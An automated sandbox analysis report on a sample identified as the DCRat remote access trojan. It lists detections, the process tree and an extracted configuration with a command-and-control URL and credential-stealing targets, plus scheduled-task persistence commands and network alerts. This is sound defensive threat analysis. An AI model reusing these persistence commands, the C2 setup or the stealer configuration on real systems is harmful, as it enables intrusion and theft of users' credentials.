Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
findme.exe

Overview

General Information

Sample name:findme.exe
Analysis ID:1589982
MD5:4fabffd3dfad2d1e11ae2317b40b6e4a
SHA1:df2ce294dc75060632bfb45add20e69ccc9396c1
SHA256:079172ddcc7b1086b9bf972b21d0d579dbff695fde14811165a986efe322873a
Tags:DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Suricata IDS alerts for network traffic
Yara detected DCRat
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Check if machine is in data center or colocation facility
Creates processes via WMI
Drops PE files with benign system names
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the hosts file
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Creates job files (autostart)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • findme.exe (PID: 7120 cmdline: "C:\Users\user\Desktop\findme.exe" MD5: 4FABFFD3DFAD2D1E11AE2317B40B6E4A)
    • wscript.exe (PID: 7028 cmdline: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 7340 cmdline: C:\Windows\system32\cmd.exe /c ""C:\runtimebrokerHost\Gjynmp1cQgbqqAJzLCDkc0fMhQUnd.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • webnetdhcp.exe (PID: 7384 cmdline: "C:\runtimebrokerHost\webnetdhcp.exe" MD5: EEC01D18C981A5973DA10C8CBAC73764)
          • schtasks.exe (PID: 7800 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7816 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 10 /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7840 cmdline: schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 9 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7888 cmdline: schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGqW" /sc MINUTE /mo 13 /tr "'C:\Users\Default User\Application Data\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7928 cmdline: schtasks.exe /create /tn "WGNWJePMcpkvwPkbkGq" /sc ONLOGON /tr "'C:\Recovery\WGNWJePMcpkvwPkbkGq.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"0\":\"^\",\"e\":\"%\",\"R\":\"_\",\"Y\":\">\",\"F\":\"#\",\"2\":\"<\",\"d\":\" \",\"G\":\"!\",\"x\":\"~\",\"I\":\";\",\"O\":\"*\",\"D\":\"$\",\"N\":\",\",\"6\":\".\",\"v\":\"(\",\"j\":\"&\",\"C\":\"-\",\"n\":\"@\",\"l\":\")\",\"J\":\"`\",\"9\":\"|\"}", "PCRT": "{\"1\":\".\",\"F\":\";\",\"5\":\"*\",\"0\":\"$\",\"Q\":\",\",\"l\":\"!\",\"2\":\"_\",\"U\":\"#\",\"B\":\">\",\"j\":\"@\",\"T\":\"|\",\"k\":\")\",\"J\":\"&\",\"d\":\"<\",\"z\":\" \",\"g\":\"~\",\"W\":\"-\",\"b\":\"%\",\"p\":\"`\",\"E\":\"(\",\"N\":\"^\"}", "TAG": "Site", "MUTEX": "DCR_MUTEX-F4bn3334YDephuxEW1IL", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb", "H2": "http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.1356824944.0000000003725000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        Process Memory Space: webnetdhcp.exe PID: 7384JoeSecurity_DCRat_1Yara detected DCRatJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Files With System Process Name In Unsuspected Locations
          Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\runtimebrokerHost\webnetdhcp.exe, ProcessId: 7384, TargetFilename: C:\Program Files (x86)\google\RuntimeBroker.exe
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\findme.exe", ParentImage: C:\Users\user\Desktop\findme.exe, ParentProcessId: 7120, ParentProcessName: findme.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbe" , ProcessId: 7028, ProcessName: wscript.exe

          Persistence and Installation Behavior

          barindex
          Sigma detected: Schedule system process
          Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\runtimebrokerHost\webnetdhcp.exe", ParentImage: C:\runtimebrokerHost\webnetdhcp.exe, ParentProcessId: 7384, ParentProcessName: webnetdhcp.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Program Files\Windows Defender\Platform\RuntimeBroker.exe'" /rl HIGHEST /f, ProcessId: 7800, ProcessName: schtasks.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-13T12:50:56.209417+010020341941A Network Trojan was detected192.168.2.75254437.44.238.25080TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-13T12:50:08.371679+010028033053Unknown Traffic192.168.2.749699208.95.112.180TCP
          2025-01-13T12:50:09.840414+010028033053Unknown Traffic192.168.2.749700208.95.112.180TCP
          2025-01-13T12:51:50.731487+010028033053Unknown Traffic192.168.2.752553208.95.112.180TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-13T12:50:56.723717+010028508621Malware Command and Control Activity Detected37.44.238.25080192.168.2.752544TCP
          2025-01-13T12:51:57.518157+010028508621Malware Command and Control Activity Detected37.44.238.25080192.168.2.752544TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-13T12:50:59.229396+010018100091Potentially Bad Traffic192.168.2.752549149.154.167.220443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: findme.exeAvira: detected
          Antivirus detection for URL or domain
          Source: http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnbAvira URL Cloud: Label: malware
          Antivirus detection for dropped file
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Users\jones\AppData\Local\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files\7-Zip\SearchApp.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\runtimebrokerHost\webnetdhcp.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Google\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Google\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\runtimebrokerHost\lsass.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Google\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\runtimebrokerHost\P6MatiaJbshfFUR3.vbeAvira: detection malicious, Label: VBS/Runner.VPG
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
          Found malware configuration
          Source: 0000000A.00000002.1434338547.000000001300D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"0\":\"^\",\"e\":\"%\",\"R\":\"_\",\"Y\":\">\",\"F\":\"#\",\"2\":\"<\",\"d\":\" \",\"G\":\"!\",\"x\":\"~\",\"I\":\";\",\"O\":\"*\",\"D\":\"$\",\"N\":\",\",\"6\":\".\",\"v\":\"(\",\"j\":\"&\",\"C\":\"-\",\"n\":\"@\",\"l\":\")\",\"J\":\"`\",\"9\":\"|\"}", "PCRT": "{\"1\":\".\",\"F\":\";\",\"5\":\"*\",\"0\":\"$\",\"Q\":\",\",\"l\":\"!\",\"2\":\"_\",\"U\":\"#\",\"B\":\">\",\"j\":\"@\",\"T\":\"|\",\"k\":\")\",\"J\":\"&\",\"d\":\"<\",\"z\":\" \",\"g\":\"~\",\"W\":\"-\",\"b\":\"%\",\"p\":\"`\",\"E\":\"(\",\"N\":\"^\"}", "TAG": "Site", "MUTEX": "DCR_MUTEX-F4bn3334YDephuxEW1IL", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"savebrowsersdatatosinglefile": false, "ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": true, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true, "searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb", "H2": "http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb", "T": "0"}
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files (x86)\Google\RuntimeBroker.exeReversingLabs: Detection: 87%
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\Program Files\7-Zip\SearchApp.exeReversingLabs: Detection: 87%
          Source: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exeReversingLabs: Detection: 87%
          Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 87%
          Source: C:\Recovery\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\Users\Public\Pictures\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\Users\jones\AppData\Local\WmiPrvSE.exeReversingLabs: Detection: 87%
          Source: C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exeReversingLabs: Detection: 87%
          Source: C:\runtimebrokerHost\lsass.exeReversingLabs: Detection: 87%
          Source: C:\runtimebrokerHost\webnetdhcp.exeReversingLabs: Detection: 87%
          Multi AV Scanner detection for submitted file
          Source: findme.exeVirustotal: Detection: 69%Perma Link
          Source: findme.exeReversingLabs: Detection: 65%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Source: C:\Users\jones\AppData\Local\WmiPrvSE.exeJoe Sandbox ML: detected
          Source: C:\Program Files\7-Zip\SearchApp.exeJoe Sandbox ML: detected
          Source: C:\runtimebrokerHost\webnetdhcp.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Google\RuntimeBroker.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Google\RuntimeBroker.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Source: C:\runtimebrokerHost\lsass.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Google\RuntimeBroker.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Source: C:\Program Files (x86)\Windows Media Player\Media Renderer\WGNWJePMcpkvwPkbkGq.exeJoe Sandbox ML: detected
          Machine Learning detection for sample
          Source: findme.exeJoe Sandbox ML: detected
          Source: findme.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\7-Zip\SearchApp.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\7-Zip\38384e6a620884Jump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\Windows Defender\Platform\RuntimeBroker.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeDirectory created: C:\Program Files\Windows Defender\Platform\9e8d7a4ca61bd9Jump to behavior
          Source: findme.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: findme.exe
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: webnetdhcp.exe, 0000000A.00000002.1475492309.000000001C820000.00000004.08000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_004CA5F4
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_004DB8E0
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004EAAA8 FindFirstFileExA,0_2_004EAAA8

          Networking

          barindex
          Suricata IDS alerts for network traffic
          Source: Network trafficSuricata IDS: 2034194 - Severity 1 - ET MALWARE DCRAT Activity (GET) : 192.168.2.7:52544 -> 37.44.238.250:80
          Source: Network trafficSuricata IDS: 2850862 - Severity 1 - ETPRO MALWARE DCRat Initial Checkin Server Response M4 : 37.44.238.250:80 -> 192.168.2.7:52544
          Source: Network trafficSuricata IDS: 1810009 - Severity 1 - Joe Security ANOMALY Telegram Send Photo : 192.168.2.7:52549 -> 149.154.167.220:443
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: http://734537cm.nyashtyan.top/@0J3bwBXdzh2chlnb
          Source: global trafficTCP traffic: 192.168.2.7:52338 -> 1.1.1.1:53
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
          Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
          Source: unknownDNS query: name: ip-api.com
          Source: unknownDNS query: name: ip-api.com
          Source: unknownDNS query: name: ip-api.com
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 208.95.112.1:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49699 -> 208.95.112.1:80
          Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:52553 -> 208.95.112.1:80
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.com
          Source: global trafficDNS traffic detected: DNS query: ip-api.com
          Source: webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003303000.00000004.00000800.00020000.00000000.sdmp, webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com
          Source: webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003303000.00000004.00000800.00020000.00000000.sdmp, webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/line/?fields=hosting
          Source: webnetdhcp.exe, 0000000A.00000002.1356824944.0000000003001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: C:\runtimebrokerHost\webnetdhcp.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior

          Spam, unwanted Advertisements and Ransom Demands

          barindex
          Modifies the hosts file
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior

          System Summary

          barindex
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004C718C: __EH_prolog,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_004C718C
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\AppReadiness\WGNWJePMcpkvwPkbkGq.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\AppReadiness\66583f2b23107cJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Media\Festival\WGNWJePMcpkvwPkbkGq.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Media\Festival\66583f2b23107cJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Provisioning\Packages\WGNWJePMcpkvwPkbkGq.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Provisioning\Packages\66583f2b23107cJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Tasks\WGNWJePMcpkvwPkbkGq.exeJump to behavior
          Source: C:\runtimebrokerHost\webnetdhcp.exeFile created: C:\Windows\Tasks\66583f2b23107cJump to behavior
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004C857B0_2_004C857B
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004C407E0_2_004C407E
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004ED00E0_2_004ED00E
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D70BF0_2_004D70BF
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004F11940_2_004F1194
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E02F60_2_004E02F6
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004C32810_2_004C3281
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CE2A00_2_004CE2A0
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D66460_2_004D6646
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E070E0_2_004E070E
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E473A0_2_004E473A
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D37C10_2_004D37C1
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004C27E80_2_004C27E8
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CE8A00_2_004CE8A0
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CF9680_2_004CF968
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E49690_2_004E4969
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D6A7B0_2_004D6A7B
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D3A3C0_2_004D3A3C
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E0B430_2_004E0B43
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004ECB600_2_004ECB60
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D5C770_2_004D5C77
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004D3D6D0_2_004D3D6D
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CED140_2_004CED14
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004DFDFA0_2_004DFDFA
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CDE6C0_2_004CDE6C
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004CBE130_2_004CBE13
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004E0F780_2_004E0F78
          Source: C:\Users\user\Desktop\findme.exeCode function: 0_2_004C5F3C0_2_004C5F3C
          Source: C:\Users\user\Desktop\findme.exeCode function: String function: 004DE28C appears 35 times
          Source: C:\Users\user\Desktop\findme.exeCode function: String function: 004DED00 appears 31 times
          Source: C:\Users\user\Desktop\findme.exeCode function: String function: 004DE360 appears 52 times
          Source: webnetdhcp.exe.0.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: WmiPrvSE.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
          Source: lsass.exe.10.drStatic PE information: Resource name: RT_VERSION type: ARM COFF executable, no relocation info, not stripped, 52 sections, symbol offset=0x5f0053, 4522070 symbols, optional header size 82, created Sat Mar 7 05:34:56 1970
